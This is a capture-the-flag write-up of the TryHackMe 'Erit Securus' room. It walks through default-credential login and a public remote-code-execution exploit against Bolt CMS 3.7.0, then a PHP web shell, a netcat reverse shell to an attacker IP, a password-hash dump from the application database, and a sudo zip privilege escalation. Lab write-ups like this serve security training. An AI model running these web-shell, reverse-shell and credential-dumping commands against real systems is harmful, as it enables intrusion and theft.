Today we are going to solve a Tryhackme Challenge called Erit Securus designed by 4nqr34z , you can get into room .
Hack everyday
So without wasting too much time let get in .
Level : Easy
Attacking Strategy
- Enumeration
- Rustscan
- Web Enumeration
- Exploitation of Bolt CMS
- Remote Code execution vulnerability
- Privilege Escalation
- Sudo rights
Enumeration
So there is a term in the field of cybersecurity more you search more you get
We start our initial scan using Rustscan , as Rustscan is fast as compare to nmap .
rustscan 10.10.99.40 --ulimit 5000 -- -A | tee nmap_result.txt


So in the result we can see port 80 , 22 are open . As of my experience I touch SSH when I don’t have any door open so let enumerate the port 80 first.
Web Enumeration
After opening on port 80 we find the website design in Bolt CMS and started my hacker vision and start digging login pages , help center or any other leak after some time and head pain we get the login page as documented in official page of CMS .

Searching on official documents

After getting to login page we try the default credential “admin : password” they work and we are in the admin panel of our CMS .


Now from here we have to dig more to get some more information like version and way to upload any kind of reverse shell and we get that CMS version is 3.7.0 which is exploitable to remote code execution vulnerability , after searching on google we get a working exploit .

” We search on searchsploit but this code is not working “

Exploitation
Now after getting the exploit from GitHub it time to fire up the gun and after successfully execution of exploit we get the remote code execution
python exploit.py http://10.10.99.40 admin password


Now here we get stuck as we didn’t notice that there is no netcat on target machine so we have to put it any how .
So we put the simple php-server payload on target , so that we can do some system level things with help of php
echo '<?php system($_GET["c"]);?>'>c1.php

after succefully putting the payload we created a symbolic link of netcat so that we can share it on target with the help of python server

Now we can call this address with help of our php payload


After we get the netcat we can now put the reverse-shell on port 4242
./nc -e /bin/sh 10.11.3.131 4242

Here we get the our reverse shell now after doing calling the proper shell we gone go to perform privilege escalation .

Privilege Escalation
Now we get a access now our main motive is to get any how the root access so let do that process but before that let’s do some enumeration
After searching into file system one thing catch my eyes that was the database of the application . Sometime we can dump out the user data and we can use it in our own way so let dump out the database.
cd /var/www/html/app/database
ls -la
sqlite3 bolt.db
.tables
SELECT * from bolt_users;

we get the hash value of some users and with help of john we can crack them easily .

After getting the password we discover the user by checking out the passwd file
cat /etc/passwd

and here we find the user “wileec” and now we switch to this user using crack password and we get our first flag in home directory of the wileec user .

Here we discovered the user private key under .ssh file so we download it and connect through it and we check the sudo right of the users .

Now let connect the target using ssh with private key and we discover that there is some other network is all there .

But before diving into this let look some other vector like suderos permission , suid ,etc
so we jump to check out the suderos of the user we identify that jsmith user can run zip command with sudo privilege so without thinking any thing we exploit this to get the jsmith user rights .

Now here we take the help of gtfobins to check out the exploitation way .
TF=$(mktemp -u)
sudo -u jsmith /usr/bin/zip $TF /etc/hosts -T -TT 'sh #'
/bin/bash

Again we check for any sudo right for this user and again we hit it

Here we get our root flag .
Hopefully you like the writeup for any query you can contact to us [email protected]
You can also dm us on twitter for query